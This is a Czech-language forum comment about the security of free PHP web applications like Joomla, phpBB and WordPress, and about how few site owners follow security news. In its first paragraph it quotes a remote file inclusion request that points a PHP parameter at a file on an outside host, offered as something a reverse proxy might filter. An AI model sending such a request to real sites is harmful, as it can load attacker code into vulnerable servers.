Odpověď na názor

Odpovídáte na názor ke článku Nebezpečný Open Source aneb script-kiddies podruhé.

  • 11. 10. 2008 9:35

    nishkam (neregistrovaný)

    [12] dekuji za odkaz na reverzni proxy. Na prvni pohled zatim nechapu jak to muze fungovat, ale potrebuji se na to lepe podivat. Pokud by slo odfiltrovat adresy typu categories/re­source_catego­ries_view.php?CLAS­SES_ROOT=http://st­ore.at.ua/tes­t.txt??
    pak by to mohlo pomoci. Sice jen tem, kdo si muze dovolit vlastni instalaci Apache, ale alespon neco.

    Toto je zajimave - "pokud nainstaluji open-source www aplikaci a nesleduji dění v bezpečnostní oblasti." IMHO deni v bezpecnostni oblasti obecne sleduje velmi malo kdo. Z tech tisic a milionu uzivatelu Joomla, phpBB a obzvlast Wordpressu, to bude mozna 1 ze 100. A to je podle mne ten problem. Pak co znamena konkretne "sledovat deni v bezpecnostni oblasti"? Kolik casu to vyzaduje a jak casto to musim delat? Myslim, ze vetsinou to funguje tak, ze uzivatel bud je schopny sam stahnout a nainstalovat nejaky free CMS anebo casteji mu to udela nejaka firma (znamy) a bezi to, aniz by se o to nekdo dal staral.

    Pokud uzivatel ma vice prostredku, aby do sveho webu investoval, vlozi je do naprogramovani nejakych dodatecnych funkci OSS, a pak vetsinou nastava ta nejhorsi situace, kdy se puvodni balik ani neda updatovat, kvuli zasahum do kodu.

    V teto chvili se zacinam schylovat k tomu, ze ten, kdo je schopen a ochoten sledovat deni v oblasti bezpecnosti, nebude vubec ochoten istalovat OSS typu free PHP aplikace. Ale mozna se mylim. Zatim je to jen uvaha. Pokud by me nekdo presvedcil o opaku, budu opravdu rad. :)

Upozorníme vás na články, které by vám neměly uniknout (maximálně 2x týdně).